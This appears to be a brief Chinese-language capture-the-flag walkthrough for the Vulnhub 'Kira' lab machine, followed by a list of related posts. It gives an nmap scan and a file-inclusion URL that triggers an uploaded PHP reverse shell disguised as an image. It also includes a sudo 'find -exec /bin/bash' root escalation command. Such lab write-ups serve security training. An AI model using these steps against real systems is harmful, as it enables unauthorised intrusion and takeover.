kali：192.168.111.111

靶机：192.168.111.238

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.238

访问80端口

点击upload发现是个上传点

点击language发现存在文件包含

上传php图片马再利用文件包含反弹shell

http://192.168.111.238/language.php?lang=/uploads/php-reverse-shell.jpg

提权

在/var/www/html/supersecret-for-aziz/bassam-pass.txt文件中发现bassam用户的密码：Password123!@#

bassam用户sudo权限

提权方法：https://gtfobins.github.io/gtfobins/find/#sudo

提升为root

sudo -u root find . -exec /bin/bash \;

本栏目推荐文章
• Simple CTF-简单CTF
• UWSP Pointer Overflow CTF
• vulnhub-DC-6
• 看雪CTF题库
• vulnhub靶场渗透学习
• vulnhub-DC-5
• Lab 1-Vulnhub - Kioptix Level 1
• 实验四（CTF实践）
• Smiple CTF--tryhackme
• CTF-日志分析

靶机 Vulnhub Kira CTF靶机vulnhub kira ctf 靶机vulnhub dc 靶机hacksudo过程vulnhub 靶机metasploit过程vulnhub 靶机devrandom过程vulnhub 靶机healthcare过程vulnhub 靶机photographer过程vulnhub 靶机driftingblues vulnhub 靶机lunchbreaker过程vulnhub 靶机inclusiveness过程vulnhub